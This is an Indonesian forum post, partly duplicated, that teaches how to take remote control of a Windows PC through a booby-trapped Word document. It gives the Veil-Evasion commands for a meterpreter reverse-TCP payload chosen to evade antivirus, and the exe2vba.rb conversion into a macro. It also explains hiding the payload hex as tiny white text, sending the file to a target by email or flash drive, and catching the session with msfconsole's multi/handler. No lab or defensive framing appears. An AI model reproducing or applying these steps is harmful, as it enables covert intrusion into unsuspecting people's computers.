09-22-2015, 11:29 PM
Untuk kesempatan kali ini saya akan berbagi ilmu untuk melakukan remote PC(windows) dengan membuat backdoor yg berektensi (.exe) yang di konversikan ke dalam visual basic melalui tools exe2vba.rb, untuk mengefektifkan waktu langsung saja ke tutorial.
tools yang di gunakan :
-msfconsole
-veil-evasion/msfpayload/msvenom (yg menghasilkan backdoor dengan ekstensi .exe)
note: "untuk kali ini saya menggunakan veil-evasion karena kemungkinan terdeteksi virus-nya rendah .
Bagi yang belum menginstall tools ini , cukup install via "apt-get install veil-evasion"
-ms word
-exe2vba.rb
Proses pembuatan Payload/Backdoor
Yang pertama jalankan tools veil-evasion, buka bash/terminal ketik
lalu hasil nya akan seperti ini
pilih jenis payload yang akan dibuat, saya memilih nomor 45 ruby/meterpreter/rev_tcp
note:"anda boleh memilih opsi lain yang bisa di compile/konversi kan ke dalam bentuk .exe", ketik
Kemudian ketik
keterangan:
-"compile_to_exe" untuk mengubah mentuk payload dari .rb(ruby) ke dalam bentuk .exe
-"192.168.1.16" adalah ip address saya
-"443" port yang kali ini saya gunakan
beri nama payload yang sudah kita buat
Proses konversi dari .exe ke visual basic
ketik
untuk mengetahui letak tools exe2vba, ubah direktori ke tempat tools tersebut, kemudian jalankan exe2vba.rb ketik
keterangan:
-"/var/lib/veil-evasion/output/compiled/payload.exe" adalah lokasi payload yang sebelumnya sudah kita buat
-"/root/Desktop/payload.txt" adalah lokasi dari hasil konversi yang diberi nama "payload.txt"
Proses infeksi/penanaman payload/backdoor ke dalam suatu dokumen ms word
Siapkan sebuah dokumen yang akan ditanami backdoor/payload, dan juga payload.txt
di desktop anda
buka file "payload.txt" lalu copy semua visual basic kode dari mulai "Sub Auto..." sampai "End sub" yang paling akhir
kemudian buka dokumen ms word , lalu pilih menu "View>Macros"
note:"konten macros ini masih ada semenjak ms word 2003, meski banyak disalahgunakan, tetapi konten ini masih ada sampai sekarang"
selanjutnya isikan nama macro "apasaja" , Macros in: "dokumen yang akan kita tanami backdoor/payload, klik "Create"
paste visual basic kode nya ke dalam macros lalu save
buka kembali "payload.txt" kemudian copy semua "hex dump"/Payload data
paste payload data tadi ke dalam dokumen , tepatnya di akhir halaman
ubah huruf payload data menjadi ukuran yang paling kecil, dan ubah warna-nya menjadi putih sehingga target tidak curiga dengan keberadaan payload/backdoor tersebut, hasilnya seperti gambar berikut:
"Kirimkan dokumen ini ke komputer target bisa melalui flashdisk,e-mail,file transfer dan lainnya"
Proses remoting
buka terminal/bash, kemudian jalankan msfconsole, ketik
setelah msfconsole terbuka lalu ketik
"Ketika target membuka dokumen dengan enabled macros, session akan terbuka, dan Remote PC berhasil dilakukan
"
Selesai
tools yang di gunakan :
-msfconsole
-veil-evasion/msfpayload/msvenom (yg menghasilkan backdoor dengan ekstensi .exe)
note: "untuk kali ini saya menggunakan veil-evasion karena kemungkinan terdeteksi virus-nya rendah .
Bagi yang belum menginstall tools ini , cukup install via "apt-get install veil-evasion"
-ms word
-exe2vba.rb
Proses pembuatan Payload/Backdoor
Yang pertama jalankan tools veil-evasion, buka bash/terminal ketik
Code:
veil-evasion
Spoiler! :
note:"anda boleh memilih opsi lain yang bisa di compile/konversi kan ke dalam bentuk .exe", ketik
Code:
use 45
Spoiler! :
Code:
compile_to_exe
set lhost 192.168.1.16
set lport 443
generate
Spoiler! :
-"compile_to_exe" untuk mengubah mentuk payload dari .rb(ruby) ke dalam bentuk .exe
-"192.168.1.16" adalah ip address saya
-"443" port yang kali ini saya gunakan
beri nama payload yang sudah kita buat
Spoiler! :
Proses konversi dari .exe ke visual basic
ketik
Code:
locate exe2vba.rb
Code:
./exe2vba.rb /var/lib/veil-evasion/output/compiled/payload.exe /root/Desktop/payload.txt
-"/var/lib/veil-evasion/output/compiled/payload.exe" adalah lokasi payload yang sebelumnya sudah kita buat
-"/root/Desktop/payload.txt" adalah lokasi dari hasil konversi yang diberi nama "payload.txt"
Spoiler! :
Proses infeksi/penanaman payload/backdoor ke dalam suatu dokumen ms word
Siapkan sebuah dokumen yang akan ditanami backdoor/payload, dan juga payload.txt
di desktop anda
Spoiler! :
Spoiler! :
note:"konten macros ini masih ada semenjak ms word 2003, meski banyak disalahgunakan, tetapi konten ini masih ada sampai sekarang"
Spoiler! :
Spoiler! :
Spoiler! :
Spoiler! :
Spoiler! :
Spoiler! :
Proses remoting
buka terminal/bash, kemudian jalankan msfconsole, ketik
Code:
msfconsole
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.16
set lport 443
exploit
Spoiler! :
"
Selesai
"Why just hack half of the world if you can hack all of it?!"
REP 4 REP
REP 4 REP